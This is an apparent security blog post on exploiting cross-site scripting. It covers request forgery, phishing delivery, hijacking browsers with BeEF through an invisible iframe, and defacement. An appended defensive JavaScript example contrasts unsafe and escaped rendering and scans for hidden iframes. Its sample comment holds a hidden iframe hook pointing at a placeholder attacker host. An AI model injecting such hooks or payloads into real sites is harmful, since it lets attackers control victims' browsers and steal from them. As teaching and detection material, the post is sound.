XSS Part 3: Exploitation

Posted on October 15th, 2015


In part 1 we introduced XSS, in part 2 we showed some TTPs for enumerating XSS, and in part 3 we will demonstrate how to take advantage of it.  XSS can lead to full control over an application or system because it gives the attacker the ability to run code in the victim's browser. This code is normally HTML/JavaScript used to do a number of things:

  • Forge a request in the application (for example, adding a user or changing a password)
  • Deliver an exploit to get code execution on the victim's system
  • Control the victim's browser (hijacking)
  • Deface the application

With reflected XSS you'll likely need to get the user to click a link containing the XSS payload, such as in a phishing email.  With stored XSS you might just need the user to use the application for your payload to load in the victim's browser.

As we mentioned in the previous post, the types of payloads you'll be able to use may depend on the defensive mechanisms in place.  You should also test your payload in a few browsers, because a payload that works in Mozilla Firefox may not work in Chrome.

The Browser Exploitation Framework (BeEF)

BeEF is a penetration testing tool that targets the web browser.  It can be used in conjunction with an XSS flaw to control a victim's browser and accomplish a number of things (deliver exploits, run additional social engineering attacks, take screenshots, control the webcam, etc.).  With XSS, a common way to leverage BeEF is with an iframe:


The example above effectively drops an invisible iframe on the page.  This could be leveraged with either stored or reflected XSS, but depending on the filters in place you might need to get more creative.  The screenshot below shows BeEF's GUI:


Defacing an application can have a bigger impact on an organization than they may initially realize when analyzing the XSS vulnerability.  Many organizations rely on their web applications as a critical part of their business, and if customers lose trust in them, they may take their business elsewhere.  We can use a similar iframe payload as an example, but this time we can have it be visible on screen to replace the application content.
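Both the hidden BeEF-hook frame and the visible defacement frame described above land on the page through the same defect: user-supplied text is written into HTML without encoding. The following is an added example, not code from the original post, showing the vulnerable rendering beside the encoded fix, plus a heuristic scanner a defender can run over stored content to triage hidden-iframe injections; the function names, the attacker.example host and the sample comment are constructed for illustration.

```javascript
// Added example (not from the original post). All names are hypothetical.

// Contextual output encoding for the HTML body context.
function escapeHtml(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#x27;");
}

// Vulnerable: user-controlled text is concatenated into markup unchanged,
// so any HTML in the comment (an iframe, a script tag) is rendered as markup.
function renderCommentUnsafe(author, body) {
  return `<div class="comment"><b>${author}</b>: ${body}</div>`;
}

// Hardened: the same template with every untrusted value encoded, so the
// browser shows the attacker's markup as literal text instead of executing it.
function renderCommentSafe(author, body) {
  return `<div class="comment"><b>${escapeHtml(author)}</b>: ${escapeHtml(body)}</div>`;
}

// Detection heuristic over stored content: iframes that are hidden or sized
// to nothing, which is how the post describes the hook being dropped on a
// page. Returns the src of each suspicious frame. Regex-based, so treat it
// as a triage signal rather than an HTML parser.
const IFRAME_RE = /<iframe\b([^>]*)>/gi;
function findHiddenIframes(html) {
  const hits = [];
  for (const m of html.matchAll(IFRAME_RE)) {
    const attrs = m[1];
    const hidden =
      /display\s*:\s*none|visibility\s*:\s*hidden/i.test(attrs) ||
      /\b(?:width|height)\s*=\s*["']?0(?:px)?["']?/i.test(attrs);
    if (hidden) {
      const src = /\bsrc\s*=\s*["']?([^"'\s>]+)/i.exec(attrs);
      hits.push(src ? src[1] : "(no src)");
    }
  }
  return hits;
}

// Constructed sample: a stored comment carrying a hidden iframe that points
// at a placeholder host (attacker.example is not a real hook URL).
const SAMPLE_BODY =
  'nice post <iframe src="http://attacker.example/hook" style="display:none"></iframe>';
```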